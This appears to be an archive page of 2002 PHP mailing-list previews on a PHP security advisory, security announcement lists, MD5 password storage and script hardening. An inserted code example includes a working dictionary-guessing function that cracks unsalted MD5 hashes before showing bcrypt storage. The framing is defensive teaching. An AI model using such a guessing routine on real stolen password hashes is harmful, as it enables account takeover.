PHP Security Advisory: Vulnerability in PHP versions 4.2.0 and 4.2.1
Issued on: July 22, 2002
Software: PHP versions 4.2.0 and 4.2.1
Platforms: All
The PHP Group has learned of a serious security
Hi all,
Just wanting to notify everyone that
the link for the PHP.4.2.2 download is broken.
-Stathis.
--
Rouvas Stathis
[EMAIL PROTECTED]
http://www.di.uoa.gr/~rouvas
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Yes. Please post something to php.announce! Nothing ever gets announced in
there anymore.
Steve Meyers [EMAIL PROTECTED] wrote in message
news:[EMAIL PROTECTED]...
Can you post this to php.announce as well?
Marko Karppinen wrote:
PHP Security Advisory:
[delete some flaming]
Hehe, and I thought I had to go to USENET to see a flamewar. This is great,
a flamewar delivered directly to my mailbox, it doesn't get better...
Let me put my $0.02 in. Security holes happen, no matter what software you
use. PHP and open source in general,
Any real programmer should know that almost nothing is bug free, even if you
test it beyond your imagination. Something is always going to elude you and
be found by someone experimenting down the road.
For the widespread use of PHP, I'm rather impressed by the small amount of
vulnerabilities
Hi ...
I want to be warned about php security issues, I couldn't find
an exact match in the mailing list names ... which one do you
recommend?
I believe that the Announce list would have any critical security warnings
sent to it.
It's also very low-volume.
--
Like Music?
Hello,
On 07/22/2002 08:07 PM, Dario Bahena Tapia wrote:
Hi ...
I want to be warned about php security issues, I couldn't find
an exact match in the mailing list names ... which one do you
recommend?
http://www.phpadvisory.com/ is what you are looking for.
--
Regards,
Manuel Lemos
You could store passwords as MD5 hashes which of course is NOT really
encryption, but it would obfuscate the users' passwords. They would still
be vulnerable to social engineering (Hmm, I'll try his wife's name, then
his dog's name, then his phone#, etc) and brute force (I'm going to run
every
Are you telling me that you cannot look at
37b51d194a7513e45b56f6524f2d51f2 and see that this is the same as bar?
... Just kidding.
Thanks for the tip, that makes a lot of sense.
Andrew Chase [EMAIL PROTECTED] wrote in message
news:[EMAIL PROTECTED]...
You could store
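An added example for the two points Andrew makes (not code from the thread): an unsalted MD5 is fast and identical for every user with the same password, so the "wife's name, dog's name, phone number" dictionary is a matter of milliseconds, and the hash quoted in the reply (37b51d194a7513e45b56f6524f2d51f2) really is md5('bar'). password_hash() and password_verify() (PHP 5.5+, bcrypt by default) give a per-user salt and a tunable cost so that each guess is expensive. The word list and cost value are assumptions.

```php
<?php
// Added example: dictionary attack on a plain MD5 versus bcrypt storage.

function md5_guess(string $stored_md5, array $wordlist): ?string
{
    // Unsalted: one md5() per guess, and a hit for one user is a hit for
    // every user who chose the same password.
    foreach ($wordlist as $w) {
        foreach (['', '1', '123', '2002'] as $suffix) {
            if (md5($w . $suffix) === $stored_md5) {
                return $w . $suffix;
            }
        }
    }
    return null;
}

function store_password(string $plain): string
{
    // cost 12 is roughly a few hundred ms per hash on current hardware
    // (assumed; measure on your own box and raise it over time).
    return password_hash($plain, PASSWORD_BCRYPT, ['cost' => 12]);
}

function check_password(string $plain, string $hash): bool
{
    // Constant-time compare, salt read back out of the hash string itself.
    return password_verify($plain, $hash);
}

// Constructed demo
$wordlist = ['alice', 'rover', 'secret', 'bar'];
echo 'thread hash guessed as: ', md5_guess('37b51d194a7513e45b56f6524f2d51f2', $wordlist), "\n"; // bar
echo 'dog+year guessed as:    ', md5_guess(md5('rover2002'), $wordlist), "\n";                   // rover2002

$hash = store_password('rover2002');
var_dump(check_password('rover2002', $hash));      // bool(true)
var_dump(check_password('rover2003', $hash));      // bool(false)
var_dump($hash !== store_password('rover2002'));   // bool(true): fresh salt every time

// When the cost needs raising later, rehash transparently on a successful login.
if (password_needs_rehash($hash, PASSWORD_BCRYPT, ['cost' => 13])) {
    $hash = password_hash('rover2002', PASSWORD_BCRYPT, ['cost' => 13]);
}
```

bcrypt does not stop the dictionary attack on a weak password; it just makes each guess cost as much as you choose, and makes the attacker pay it separately for every user.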
on 03/07/02 11:36 PM, Jean-Christian Imbeault ([EMAIL PROTECTED])
wrote:
In general how does one go about hardening a PHP script. i.e. making it
as hacker-proof as possible. General things like:
I think the general answer is you can't, but you can make it more secure.
- verifying user
Jean-Christian Imbeault wrote:
I'm writing my first commercial site and of course I am thinking about
security. I'm worried about someone using a flaw in my PHP script
logic to access information they shouldn't.
I've read the PHP books I have and Googled around but can't quite find
Chris Shiflett wrote:
Jean-Christian Imbeault wrote:
In general how does one go about hardening a PHP script. i.e. making
it as hacker-proof as possible
There is no such thing as a 100% secure solution (this applies to
everything running on a computer, PHP included). But basically you can
Justin French wrote:
This list really does work best (ie best results for you) if you come to us
with a specific problem, rather than something general.
I totally agree. Sorry to have asked such a wide question but in this
case it is a bit of a chicken-or-the-egg situation. To make your
On Tuesday, June 25, 2002, at 08:26 PM, Analysis Solutions wrote:
I usually run PHP as CGI. My secure files are kept in a directory that's
not under the */docroot. Thus, they can't be gotten to through the web
server at all. Plus, the secure files are chmoded 600 (which means they
On Tuesday, June 25, 2002, at 08:26 PM, Analysis Solutions wrote:
I usually run PHP as CGI. My secure files are kept in a directory that's
not under the */docroot. Thus, they can't be gotten to through the web
server at all. Plus, the secure files are chmoded 600 (which means they
No. The only way they can get your source is by ftping or having shell
access to your server. And even then, they'd have to have read perms on
your web folder/files. If you were to have a lot of unknown people
jacking around on your server, you have a lot of other stuff to worry
about that
On Tuesday, June 25, 2002, at 03:46 PM, Peter wrote:
When you have the standard
$link = mysql_connect(localhost,username,secretpassword);
Would it not be possible for someone to use PHP from another server to
download your source and find out your MySQL details including password?
Yes.
On Tuesday, June 25, 2002, at 03:46 PM, Peter wrote:
When you have the standard
$link = mysql_connect(localhost,username,secretpassword);
Would it not be possible for someone to use PHP from another server to
download your source and find out your MySQL details including password?
That's a big can of worms :)
I think perhaps start with one problem, like sessions, then move onto
another problem.
Not really sure what you mean by cross site scripting... maybe you mean
writing decent code once, and having it portable to many new projects with
little fuss?
Justin French